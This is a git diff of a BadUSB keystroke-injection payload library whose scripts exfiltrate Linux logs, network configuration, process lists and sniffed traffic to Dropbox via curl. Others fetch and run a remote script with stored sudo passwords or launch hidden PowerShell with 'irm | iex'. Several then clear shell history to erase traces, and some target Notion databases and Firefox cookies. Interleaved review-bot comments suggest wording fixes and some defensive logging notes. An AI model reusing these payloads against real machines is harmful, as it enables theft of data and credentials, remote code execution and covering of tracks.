b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md index 8f44f1c..19cec2e 100644 --- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md +++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md 
@@ -1,11 +1,9 @@ -# Exfiltrate Linux Content With Dropbox - BADUSB ✅ +# Exfiltrate Linux Content With Dropbox A script used to take folder content on Linux Systems. **Category**: Exfiltration, Execution -[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) - ## Description A script used to take folder content on Linux Systems. diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md index 346d51d..77df483 100644 --- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md @@ -1,12 +1,10 @@ -# Exfiltrate Linux Log Files - BADUSB ✅ +# Exfiltrate Linux Log Files A script used to take linux logs. **Category**: Exfiltration, Execution -[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits) - ## Description A script used to take linux logs. diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt index dbd546f..721e08c 100644 --- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt 
@@ -1,80 +1,93 @@ -REM ###################################################### -REM # | -REM # Title : Exfiltrate Linux Logs With Dropbox | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration, Execution | -REM # Target : Linux | -REM # | -REM ###################################################### +REM_BLOCK +###################################################### +# # +# Title : Exfiltrate Linux Logs With Dropbox # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration, Execution # +# Target : Linux # +# # +###################################################### +END_REM REM Requirements: REM - Internet Connection REM - Dropbox Account REM - - DROPBOX_ACCESS_TOKEN - -DELAY 1000 -CTRL-ALT t - REM Required: Set here your Dropbox access TOKEN -DELAY 2000 -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +DEFINE #TOKEN example +REM Send to Dropbox function +DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +CTRL-ALT t +DELAY 2000 +STRINGLN ACCESS_TOKEN="#TOKEN" DELAY 500 -STRING USER_NAME=$(whoami) -ENTER +STRINGLN USER_NAME=$(whoami) REM Create random num DELAY 500 -STRING RANDOM=$(shuf -i 1-999999999999 -n 1) -ENTER +STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1) REM Folder path DELAY 500 -STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" 
prefix-XXXXXXXXXX) -ENTER +STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) REM Zip path DELAY 500 -STRING ZIP_NAME="$RANDOM.zip" -ENTER +STRINGLN ZIP_NAME="$RANDOM.zip" DELAY 500 -STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" -ENTER +STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" REM Default log path DELAY 500 -STRING LOG_PATH="/var/log/" -ENTER +STRINGLN LOG_PATH="/var/log/" DELAY 500 -STRING zip -r "$ZIP_PATH" "$LOG_PATH" -ENTER +STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH" REM Delay of zipping operation - it depends DELAY 10000 DELAY 500 -STRING DROPBOX_FOLDER="/$ZIP_NAME" -ENTER +STRINGLN DROPBOX_FOLDER="/$ZIP_NAME" -REM Send to Dropbox function -DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload DELAY 500 -STRING curl -X POST -STRING DROPBOX_API_LINK -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" -ENTER +STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" REM Send timing - it depends DELAY 5000 DELAY 500 -STRING rm -rf "$TMP_FOLDER_PATH" -ENTER +STRINGLN rm -rf "$TMP_FOLDER_PATH" diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md index 56817ac..542ee44 100644 --- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md 
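Review bot: The comment `REM Send to Dropbox function` was moved to the top along with `DEFINE #DROPBOX_API_LINK`, where it no longer describes anything, and the `STRINGLN curl -X POST …` line it used to introduce is now uncommented. Reword the one at the DEFINE to something like `REM Dropbox upload endpoint, don't edit`, matching the wording the ExfiltrateNetworkConfiguration payload uses for the same constant. Then keep a short `REM Send to Dropbox` directly above the `curl` line. The back-to-back `DELAY 10000` / `DELAY 500` and `DELAY 5000` / `DELAY 500` pairs left by the conversion could each be a single `DELAY` with the existing "it depends" remark beside it.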
@@ -1,5 +1,5 @@ -# Exfiltrate Network Configuration - Linux ✅ +# Exfiltrate Network Configuration - Linux A script used to exfiltrate the network configuration on a Linux machine. diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt index 91230a9..932483b 100644 --- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt 
@@ -1,96 +1,101 @@ - -REM ########################################################## -REM # | -REM # Title : Exfiltrate Linux Network Configuration | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration, Execution | -REM # Target : Linux | -REM # | -REM ########################################################## +REM_BLOCK +########################################################## +# # +# Title : Exfiltrate Linux Network Configuration # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration, Execution # +# Target : Linux # +# # +########################################################## +END_REM REM Requirements: REM - Internet Connection REM - Dropbox Account REM - - DROPBOX_ACCESS_TOKEN -DELAY 1000 -CTRL-ALT t - -DELAY 2000 REM Required: Set here your Dropbox access TOKEN -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +DEFINE #TOKEN example -REM DELAY 500 -REM STRING USER_NAME=$(whoami) -REM ENTER +REM Set yout Dropbox folder name +DEFINE #DROPBOX_FOLDER_NAME example + +REM This is just a Dropbox const, don't edit +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +CTRL-ALT t +DELAY 2000 +STRINGLN ACCESS_TOKEN="#TOKEN" DELAY 500 -STRING RANDOM=$(shuf -i 1-999999999999 -n 1) -ENTER +STRINGLN USER_NAME=$(whoami) DELAY 500 -STRING ZIP_NAME="$RANDOM.zip" 
-ENTER +STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1) + DELAY 500 -STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" -ENTER +STRINGLN ZIP_NAME="$RANDOM.zip" +DELAY 500 +STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" REM Folder path DELAY 500 -STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) -ENTER +STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) DELAY 500 -STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" -ENTER +STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt" DELAY 1000 -STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" -ENTER +STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" DELAY 1000 -STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" -ENTER +STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" DELAY 1000 REM Delay for zipping operation, it depends by computer power and folder directory STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" DELAY 3000 - -REM Set yout Dropbox folder name -DEFINE DROPBOX_FOLDER_NAME example -STRING DROPBOX_FOLDER="/ -ENTER -STRING DROPBOX_FOLDER_NAME -ENTER -STRING " -ENTER +STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME" DELAY 500 -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" -ENTER + +STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" DELAY 2000 -STRING history -c -ENTER +STRINGLN history -c DELAY 500 -STRING rm -rf "$TMP_FOLDER_PATH" -ENTER 
+STRINGLN rm -rf "$TMP_FOLDER_PATH" DELAY 500 -STRING rm -rf "$ZIP_PATH" -ENTER - -DELAY 500 -STRING exit -ENTER \ No newline at end of file +STRINGLN rm -rf "$ZIP_PATH"; exit \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt index 5104923..04209f1 100644 --- a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt 
@@ -1,57 +1,76 @@ - -REM ############################################# -REM # | -REM # Title : Exfiltrate Network Traffic | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Linux | -REM # | -REM ############################################# +REM_BLOCK +############################################# +# # +# Title : Exfiltrate Network Traffic # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Linux # +# # +############################################# +END_REM REM Requirements: REM - Permissions REM - Internet Connection REM REQUIRED: You need to know the sudo password and replace 'example' with this -DEFINE SUDO_PASS example +DEFINE #SUDO_PASS example + REM REQUIRED: Set what you want to sniff, for example tcp port 80 -DEFINE SNIFFING example +DEFINE #SNIFFING example + REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file -DEFINE TOKEN example +DEFINE #TOKEN example + REM Just a Dropbox const -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + REM Output file path packets.pcap, remember to use pcap extension -DEFINE FILE example.pcap +DEFINE #FILE example.pcap +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION -DELAY 1000 CTRL-ALT t DELAY 2000 - REM #### PERMISSIONS SECTION #### - - STRINGLN sudo 
su DELAY 1000 -STRINGLN SUDO_PASS +STRINGLN #SUDO_PASS DELAY 1000 - REM #### Network Traffic SECTION #### - - -STRING FILE_PATH=" -STRING FILE -STRING " -ENTER +STRINGLN FILE_PATH="#FILE" DELAY 500 -STRING filter_expression=" -STRING SNIFFING -STRING " -ENTER +STRINGLN filter_expression="#SNIFFING" DELAY 500 REM Network card name @@ -71,28 +90,18 @@ DELAY 60000 REM Kill the process by PID STRINGLN kill $tcpdump_pid - REM #### Exfiltrate SECTION #### REM You can use whatever you want, i use Dropbox -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +STRINGLN ACCESS_TOKEN="#TOKEN" DELAY 500 STRINGLN DROPBOX_FOLDER="/Exfiltration" DELAY 500 -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH" -ENTER - +STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH" REM #### REMOVE TRACES #### - - STRINGLN rm "$FILE_PATH" DELAY 500 diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt index 8a26d43..c0314df 100644 --- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt +++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt 
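Review bot: `DEFINE #SUDO_PASS example` in the first hunk keeps the target account's sudo password in clear text in a file on removable media, and `STRINGLN #SUDO_PASS` then types it blind one fixed `DELAY 1000` after `sudo su`. If the password prompt does not hold focus at that moment, the password is echoed in the terminal as an ordinary command line, which exposes a client credential on screen and possibly in shell history. Add a comment at the DEFINE, for example `REM Stored and typed in clear text: never commit a real value, and wipe the device after the engagement`. The `#SUDO-PSWD` define in the ExfiltratePhotosThroughShell hunk has the same exposure.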
@@ -1,13 +1,14 @@ - -REM ################################################## -REM # | -REM # Title : Exfiltrate Photos Through Shell | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Linux | -REM # | -REM ################################################## +REM_BLOCK +################################################## +# # +# Title : Exfiltrate Photos Through Shell # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Linux # +# # +################################################## +END_REM REM Requirements: REM - Internet Connection 
@@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam' REM - for add the -x permission to the script.sh downloaded REM REQUIRED - replace example.com with your script.sh link -DEFINE SCRIPT-SH-LINK example.com +DEFINE #SCRIPT-SH-LINK example.com REM REQUIRED - sudo Password -DEFINE SUDO-PSWD example +DEFINE #SUDO-PSWD example + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION -DELAY 1000 CTRL-ALT t DELAY 2000 - REM #### Permission #### - REM This section of sudo time depends by the computer power on which it runs. REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs. -STRING sudo su -ENTER +STRINGLN sudo su DELAY 500 -STRING SUDO-PSWD -ENTER +STRINGLN #SUDO-PSWD REM DELAY Based On Computer Power DELAY 5000 REM If you want to install the dependency of fswebcam you should decommend it. 
-REM STRING apt install fswebcam -y -REM ENTER +REM STRINGLN apt install fswebcam -y REM DELAY Based On Internet Power REM DELAY 5000 - REM #### Script #### - - -STRING curl -STRING SCRIPT-SH-LINK -STRING > script.sh -ENTER +STRINGLN curl #SCRIPT-SH-LINK > script.sh REM DELAY Based On Internet Power DELAY 4000 -STRING chmod +x script.sh -ENTER +STRINGLN chmod +x script.sh DELAY 500 -STRING nohup ./script.sh > /dev/null 2>&1 & exit -ENTER +STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt index bdea251..3a3ccae 100644 --- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt 
@@ -1,73 +1,79 @@ - -REM ########################################## -REM # | -REM # Title : Exfiltrate Process Info | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Linux | -REM # | -REM ########################################## +REM_BLOCK +########################################## +# # +# Title : Exfiltrate Process Info # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Linux # +# # +########################################## +END_REM REM Requirements: REM - Internet Connection REM - Discord Webhook -DELAY 1000 +REM Set yout Dropbox folder name +DEFINE #DROPBOX_FOLDER_NAME example + +REM This is just a Dropbox const, don't edit +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + CTRL-ALT t DELAY 2000 - REM #### GET PROCESS SECTION #### - - -STRING ps aux > process.txt -ENTER +STRINGLN ps aux > process.txt DELAY 500 - REM #### EXFILTRATE SECTION #### - - REM Required: Set here your Dropbox access TOKEN DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +STRINGLN ACCESS_TOKEN="#TOKEN" DELAY 500 -STRING USER_NAME=$(whoami) -ENTER +STRINGLN USER_NAME=$(whoami) DELAY 500 -STRING TXT_PATH="/home/$USER_NAME/process.txt" -ENTER +STRINGLN TXT_PATH="/home/$USER_NAME/process.txt" DELAY 500 -REM Set yout Dropbox folder name 
-DEFINE DROPBOX_FOLDER_NAME example -STRING DROPBOX_FOLDER="/ -STRING DROPBOX_FOLDER_NAME -STRING " -ENTER +STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME" DELAY 500 -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" -ENTER +STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH" REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient DELAY 2000 - REM #### REMOVE TRACES #### - - -STRING history -c -ENTER -DELAY 500 -STRING exit -ENTER +STRINGLN history -c; exit \ No newline at end of file diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt index 1b02c91..7716658 100644 --- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt 
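Review bot: The header still lists `REM - Discord Webhook` under Requirements, but every exfiltration line in this hunk targets Dropbox (`#DROPBOX_API_CONST`, `ACCESS_TOKEN`, `DROPBOX_FOLDER`). Someone reading the payload to assess it, or writing egress rules for an exercise, is pointed at the wrong service. Replace that requirement with the wording the sibling payloads use, `REM - Dropbox Account` and `REM - - DROPBOX_ACCESS_TOKEN`.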
@@ -1,26 +1,66 @@ -REM ########################################## -REM # | -REM # Title : Exfiltrate Process Info | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ########################################## +REM_BLOCK +########################################## +# # +# Title : Exfiltrate Process Info # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +########################################## +END_REM REM Requirements: REM - Internet Connection REM - Dropbox Webhook REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1 -DEFINE PAYLOAD example.com +DEFINE #PAYLOAD example.com +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION -DELAY 2000 GUI r DELAY 250 DELETE -STRING powershell -w h -ep bypass irm -STRING PAYLOAD -STRING | iex -ENTER +STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex 
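Review bot: The payload header documents nothing about what the one typed line leaves on the host, which is what a defender replaying this in a lab most needs. `powershell -w h -ep bypass irm #PAYLOAD | iex` runs a remote script in a hidden window with the execution policy bypassed, so the file itself never shows what code executes; the command is typically recorded in the Run dialog's RunMRU registry key and, where script block logging is enabled, the downloaded script appears in PowerShell event 4104. I would add a short REM_BLOCK after the Requirements lines listing these artifacts and stating that the script behind `#PAYLOAD` must be reviewed separately. The ProtonVPN-config payload at the end of this diff uses the same launcher shape.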
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md index faf0d9f..432a66a 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md @@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
Github - - - - -
Instagram - -
Discord +
Linkedin - + \ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt index 8610368..bc46354 100644 --- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt +++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt 
@@ -1,26 +1,68 @@ -REM ######################################################################### -REM # | -REM # Title : Exfiltrates the entire database of the Notion client | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM ######################################################################### - +REM_BLOCK +######################################################################### +# # +# Title : Exfiltrates the entire database of the Notion client # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +######################################################################### +END_REM REM Requirements: REM - Notion must be installed REM - Internet Connection - REM You must define your Dropbox accessToken or modify the exfiltration modality. DEFINE #DROPBOX_ACCESS_TOKEN example +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! 
+ END_IF + END_REM +END_EXTENSION + GUI r DELAY 1000 -STRING PowerShell -ENTER +STRINGLN PowerShell DELAY 2000 REM Settings about Notion DB diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt index 3ef6e5c..88aa91e 100644 --- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt +++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt 
@@ -1,31 +1,69 @@ -REM #################################################### -REM # | -REM # Title : Export Firefox Cookies Database | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Exfiltration | -REM # Target : Windows 10-11 | -REM # | -REM #################################################### - +REM_BLOCK +#################################################### +# # +# Title : Export Firefox Cookies Database # +# Author : Aleff # +# Version : 1.0 # +# Category : Exfiltration # +# Target : Windows 10-11 # +# # +#################################################### +END_REM REM Requirements: REM - Firefox must be installed - REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. -DEFINE DROPBOX_ACCESS_TOKEN "example" +DEFINE #DROPBOX_ACCESS_TOKEN "example" +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect 